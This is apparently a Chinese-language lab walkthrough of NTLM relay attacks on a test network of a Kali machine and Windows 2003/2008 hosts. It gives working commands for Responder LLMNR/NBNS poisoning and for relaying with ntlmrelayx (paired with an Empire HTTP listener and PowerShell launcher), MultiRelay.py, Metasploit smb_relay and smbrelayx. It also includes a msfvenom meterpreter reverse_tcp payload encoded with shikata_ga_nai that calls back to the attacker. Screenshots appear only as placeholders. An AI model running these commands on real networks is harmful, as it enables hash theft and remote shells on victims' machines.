三台机器
kali:192.168.64.133
win2008:192.168.64.135
win2003:192.168.64.134
使用responder
(需要访问一个不存在的共享路径,因为要降到LLMNR NBNS)
image.png
然后去访问一个不存在的共享路径 dir \dc\d$
然后就抓到hash了
responder充其量只有一个回显hash功能,可以结合ntlmrelayx.py和Empire框架进行进一步利用
修改/etc/responder/Responder.conf禁用SMB和HTTP功能。
执行responder -I eth0 -r -d -v
利用empire
image.png
创建一个listeners
listeners
uselistener http
set Host http://192.168.64.132:8080
set Port 8080
set Name test
execute
image.png
生成powershell命令:
launcher powershell
开启中继,python3 ntlmrelayx.py -t 192.168.64.134 -c 'powershell脚本生成的内容'
然后这边就开始毒化了
image.png
将Windows2003的密码改为与Windows2008一样之后,资源管理器访问\test,终于成功了。
image.png image.png image.png
排错:
1、Unexpected keyword argument 'randomize'
https://github.com/SecureAuthCorp/impacket/issues/781
2、有个日志的参数有问题,把那行注释掉就好了
MultiRelayx.py拿下shell
利用Impacket套件中的MultiRelay.py脚本进行中继攻击
先用responder工具包里面的RunFinger.py脚本进行扫描(nmap皆可)来查看域内机器SMB签名的开放情况
./RunFinger.py -i 192.168.64.0/24
image.png
发现 SMB 签名都已禁用了,接下来开始 利用
python MultiRelay.py -t 192.168.64.134 -u ALL
image.png
现在 SMB 已经由 MultiRelay.py 脚本来进行中继,我们需要修改一下 Responder.conf 脚 本,不让其对 hash 进行抓取
image.png重启Responder.py 准备毒化
image.png
此时去win2003的机器上 传递一个SMB流量
image.png image.png使用msf的smb_relay(MS-08 068)
image.pngwin2003 cmd输入dir \192.168.64.133\c$ kali中就能看到:
image.png
直接就getshell了,因为是系统服务:
image.png
Impacket中的smbrelayx
先生成一个msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.133 LPORT=4445 -e x86/shikata_ga_nai -f exe -o ~\test.exe
image.png
然后使用监听模块(exploit -j是将得到的session放到后台)
image.png
运行smbrelayx.py(需要python3的环境),随后在Windows2003上执行dir \192.168.64.133\c$
image.png
成功获得会话
image.png
03的登录日志:
image.png
网友评论